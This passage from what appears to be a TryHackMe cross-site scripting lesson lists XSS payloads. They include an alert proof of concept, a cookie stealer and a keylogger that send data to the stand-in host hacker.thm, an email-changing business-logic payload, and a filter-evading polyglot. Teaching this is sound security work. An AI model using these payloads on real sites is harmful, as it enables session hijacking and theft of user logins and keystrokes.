**PoC**:
This is the simplest of payloads where all you want to do is demonstrate that you can achieve XSS (alert pop):

`<script>alert('THM');</script>`

**Session Stealing:**
Details of a user's session, such as login tokens, are often kept in cookies on the targets machine. The below JavaScript takes the target's cookie, base64 encodes the cookie to ensure successful transmission and then posts it to a website under the hacker's control to be logged. Once the hacker has these cookies, they can take over the target's session and be logged as that user.

`<script>fetch('https://hacker.thm/steal?cookie=' + btoa(document.cookie));</script>`

**Key Logger:**
The below code acts as a key logger. This means anything you type on the webpage will be forwarded to a website under the hacker's control. This could be very damaging if the website the payload was installed on accepted user logins or credit card details.

`<script>document.onkeypress = function(e) { fetch('https://hacker.thm/log?key=' + btoa(e.key) );}</script>`

**Business Logic:**
This payload is a lot more specific than the above examples. This would be about calling a particular network resource or a JavaScript function. For example, imagine a JavaScript function for changing the user's email address called `user.changeEmail()`. Your payload could look like this:

`<script>user.changeEmail('attacker@hacker.thm');</script>`

**Polyglots:**

An XSS polyglot is a string of text which can escape attributes, tags and bypass filters all in one. You could have used the below polyglot on all six levels you've just completed, and it would have executed the code successfully.

``jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */onerror=alert('THM') )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert('THM')//>\x3e``